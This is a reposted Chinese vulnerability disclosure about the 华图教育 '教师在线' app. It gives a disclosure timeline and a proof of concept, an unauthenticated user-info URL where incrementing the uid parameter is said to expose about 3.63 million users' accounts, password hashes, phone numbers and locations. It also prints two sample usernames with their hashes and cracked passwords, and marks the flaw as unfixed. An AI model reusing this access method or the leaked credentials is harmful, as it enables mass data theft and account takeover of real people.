loading

资讯

教师在线泄露大量敏感数据-华图教育旗下教师在线APP

namesilo全网最便宜域名注册商,输入折扣码:nsilo20立减1美元!

教师在线泄露大量敏感数据-华图教育旗下教师在线APP
潜在风险
可泄露大量数据
漏洞处理状态
暂无修复
漏洞详情
披露状态:
2017-11-7 3:00:00 漏洞细节对公众公开
2017-9-23 3:00:00 漏洞细节对牛犊公开
2017-8-24 3:00:00 漏洞细节对牛人公开
2017-8-4 3:00:00 漏洞细节对神牛和大牛公开
2017-7-25 3:00:00 漏洞细节对第三方安全公司公开
漏洞证明(POC):
注册个账户进入到app,抓包可发现一个url
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=1
然后在浏览器上查看

可以查看363万用户的账户名、密码、IP登陆地、省份、手机号等信息(密码可解密)
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=3630000

教师在线泄露大量敏感数据-华图教育旗下教师在线APP

密码能随意解密:
用户名:jszx_app407333643     passwd:edcfa7411cf3a03f   解密后:zf8790

             jszx_qq923216261    49ba59abbe56e057   123456
验证数据真实性,主站登陆
教师在线泄露大量敏感数据-华图教育旗下教师在线APP

利用代码(EXP):
教师在线泄露大量敏感数据-华图教育旗下教师在线APP
教师在线泄露大量敏感数据-华图教育旗下教师在线APP
教师在线泄露大量敏感数据-华图教育旗下教师在线APP
修复方案:
(暂无内容)

(0)

本文由 podipod软库网 作者:Anonymous 发表,转载请注明来源!

关键词:,
全国计算机等级考试题库

热评文章

发表评论